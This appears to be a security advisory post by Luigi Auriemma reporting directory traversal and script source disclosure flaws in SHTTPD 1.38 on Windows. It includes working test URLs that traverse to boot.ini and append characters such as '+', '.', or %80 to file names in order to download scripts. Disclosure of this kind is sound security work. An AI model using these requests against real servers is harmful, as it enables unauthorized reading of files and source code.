Hey,
I was testing SHTTPD and found some problems I want to report.
Note that I tested only the 1.38 version on Windows so some of the bugs
or some exploitaion methods could not work on other platforms.
The following are the details of the problems:
----------------------
A] directory traversal
----------------------
Using the "..\" pattern is possible to download any file in the disk on
which is located the web root directory.
--------------------------------------
B] scripts and CGI viewing/downloading
--------------------------------------
Any script or CGI in the server can be viewed/downloaded instead of
being executed simply adding the chars '+', '.', %20 (this one reported
by Shay priel in the summer 2007), %2e and any other byte (in hex
format too) major than 0x7f to the requested filename.
---
For testing them:
A]
http://SERVER/..\..\..\boot.ini
http://SERVER/..\%2e%2e%5c..\boot.ini
B]
http://SERVER/file.php+
http://SERVER/file.php.
http://SERVER/file.php%20
http://SERVER/file.php%80
BYEZ
---
Luigi Auriemma
http://aluigi.org
|